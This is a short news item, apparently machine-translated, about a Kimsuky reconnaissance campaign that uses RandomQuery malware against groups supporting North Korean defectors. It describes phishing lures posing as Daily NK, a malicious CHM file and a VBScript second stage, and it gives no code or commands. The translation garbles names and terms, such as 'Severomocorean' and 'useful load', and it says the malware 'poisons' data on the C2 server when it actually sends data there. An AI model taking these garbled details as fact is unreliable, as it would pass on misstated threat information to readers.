Cybersecurity researchers from Sentinelone have revealed that the Severomocorean Apt-Group Kimsuky is conducting a reconnaissance campaign by using a user-specific RandomQuery malware. The campaign specifically targets information services and organizations that support lawyer activists and defectors from North Korea.
According to the researchers, the operation has been ongoing since May 5, 2023, utilizing the RandomQuery malware, which is specially designed for file transfer and exploring confidential data. The attacks begin with phishing emails that appear to be sent on behalf of the South Korean edition of the Daily NK, covering events in North Korea, to lure victims into opening a malicious Microsoft Compiled HTML Help (ChM) file.
Once the ChM-file is launched, a Visual Basic script is performed remotely from a server, which extracts a useful load for the second stage, Randomquery VBSCRIPT options malware. The malware then collects and poisons the following data on the C2 server: system metadata, information about advanced processes and installed applications, and files from different folders.
Hackers from North Korea are known for their frequent attacks on their neighboring country, as previously reported in April and March, on South Korean politicians and civil servants, and a number of state and financial South Korean institutions, respectively. Sentinelone warns organizations to be vigilant against phishing emails and to deploy proper security measures to safeguard their systems from these kinds of attacks.
Source: Sentinelone report.